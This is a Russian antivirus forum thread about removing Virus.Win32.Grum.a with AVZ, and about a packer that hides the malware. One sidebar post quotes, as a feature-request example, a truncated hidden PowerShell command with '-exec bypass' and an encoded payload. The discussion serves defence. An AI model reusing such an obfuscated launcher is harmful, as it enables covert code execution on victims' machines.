Перейти к содержанию
Serge

Virus.Win32.Grum.a

Recommended Posts

Serge

Уважаемые борцы с вирусами!

Подскажите как удалить subj (Virus.Win32.Grum.a) с моего компьютера.

AVP 6 каждую минуту радостно сообщает, что объект winlogon.exe/winlogon.exe не вылечен.

Советы на форуме касперского тоже не помогли http://forum.kaspersky.com/index.php?showtopic=34176 :(

В обычном режиме AVZ глючит. В safe mode скрипт с сайта выполняется. Но в папке Quarantine ничего не появляется и вирус не лечится.

Что делать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Пробовали полечить компьютер в save mode Касперским?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SuperBrat
Уважаемые борцы с вирусами!

Подскажите как удалить subj (Virus.Win32.Grum.a) с моего компьютера.

AVP 6 каждую минуту радостно сообщает, что объект winlogon.exe/winlogon.exe не вылечен.

Советы на форуме касперского тоже не помогли http://forum.kaspersky.com/index.php?showtopic=34176

В обычном режиме AVZ глючит. В safe mode скрипт с сайта выполняется. Но в папке Quarantine ничего не появляется и вирус не лечится.

Что делать?

В понедельник выйдет исправленная версия AVZ. По крайней мере, так обещал О. Зайцев. Как только вы скачаете исправленную версию AVZ, выполните правила. Только сразу предупреждаю, что все программы (icq, браузеры и т.п.) во время выполнения правил должны быть закрыты.

Удачи, ждем ваши логи здесь.

P.S. Пункт 1 правил (выполняйте по совету vaber в Safe Mode) и пункт 2 можете выполнить уже сейчас не дожидаясь появления AVZ (базы антивируса и DrWeb Cure-IT должны быть свежими).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SuperBrat

Обновилась русскоязычная версия AVZ - пофиксен ряд багов, которые вылезли в ходе тестирования.

...в окне "О программе" выводится "4.24 r2" - где r - Release, цифра - номер релиза

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Денис Лебедев

А где можно скачать? На сайте у Олега в новостях ничего про это нет :roll:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

просто с офф сайта качать её..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SuperBrat
А где можно скачать? На сайте у Олега в новостях ничего про это нет

http://www.z-oleg.com/secur/avz/download.php

Только там. Обновление из программы не сработает.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Денис Лебедев

Дак а почему Олег нигде об этом не написал официально? Я б например если тут на форуме не услышал, то никогда и не узнал бы что есть какое обновление для версии.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

на вирус инфо в бета тестировании писал=))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Денис Лебедев

Аа понял, спасибо :-) Я просто думал, что будет какая-то официальная новость на главной странице :-) Потому что если бы вы не сказали - ни за что бы не подумал, что там уже лежит обновленный дистрибутив по той же самой ссылке.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dr.Golova

Последнее время стали появлятьа какие-то странный файлы, упакованные стремным пакером, запускающимся через tls коллбэки - соответственно эмуляторы всех популярных продуктов просасывали моментально. Распаковщик к пакеру я сделал (TLPack), под ним во всех самплах оказался Virus.Win32.Grum. Я уж грешным делом подумал что это компонент вируса, и собирался по примеру доктора веба задетектить этот "пакер" как грум, но вруг стал обнаружвать этот пакер на старых(!) ботах и даунлоадерах - видать кто-то приторговывает пакером по принципу "три вебмани за чистяк".

Будьте бдительны - оригинальные файлы на невооруженный взгляд выглядят как убитые вусмерть, и многие их уже скидывали в крэп.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

угу. (Файл D:Downloadswinlogon.exe//TLPack, обнаружено: вирус 'Virus.Win32.Grum.a')

А я то думал, что за пакер.

Добавлено спустя 15 минут 26 секунд:

соответственно эмуляторы всех популярных продуктов просасывали моментально

А как эмулятор Касперского (который в семерке будет)??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dr.Golova

> А как эмулятор Касперского (который в семерке будет)??

По его вердикту и стало ясно что файло рабочее.

Щас выйдет в паблик - сразу малвару переточат и тоже будет просасывать до ближайшего апдейта. Хорошо что апдейтить можно будет хоть каждый час :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Storm
Хорошо что апдейтить можно будет хоть каждый час

Надеюсь эти апдейты будут меньше метра. :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dr.Golova

> Надеюсь эти апдейты будут меньше метра.

Естесно, обычные инкрементальные апдейты, пару килобайт на апдейт, именно для этого diff'ы и делались :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dk64
Я уж грешным делом подумал что это компонент вируса, и собирался по примеру доктора веба задетектить этот "пакер" как грум

неожиданное откровение, надо признаться.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
andywer

Господа, а может ли кто нибудь скинуть этот вирус "Virus. Win32. Grum. A" на мыло, в архиве с паролем: virus

Буду очень благодарен.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×